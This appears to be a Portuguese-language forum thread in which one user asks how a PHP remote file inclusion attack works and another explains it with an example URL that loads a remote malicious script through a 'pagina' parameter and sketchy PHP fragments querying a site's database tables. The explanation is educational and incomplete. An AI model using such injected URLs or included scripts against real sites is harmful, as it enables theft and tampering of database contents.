bom, imagine que vc, na sua pagina, carrega as configuraçoes pra conexao do seu banco de dados.Não entendi como o hacker faz a pagina pra aparecer os codigos...
Como seria essa pagina "codigomalicioso.php"?
www.site.com.br/site.php?pagina=http://site.com/codigomalicioso.php![]()
Expliquem como seria e deem um exemp0lo se puderem...
e o cara carregue um codigo malicioso assim:
<?
$querydomal="show tables";
blablabla
?>
ele fica sabendo as tabelas que vc tem... aí ele faz outro script, jah sabendo o nome das tabelas
<?
$querydomal="select * from tabelacomdadosimportantes";
blablabla
?>
enfim, isso é apenas o exemplo mais comum, de conexao com o banco de dados... pode acontecer coisas ainda piores se vc carregar um script com configuraçoes de ftp... enfim, depende do que vc carrega no seu site e da imaginação do hacker...
fica sabendo tudo o que vc tem... alem de poder dar update, delete e outras coisas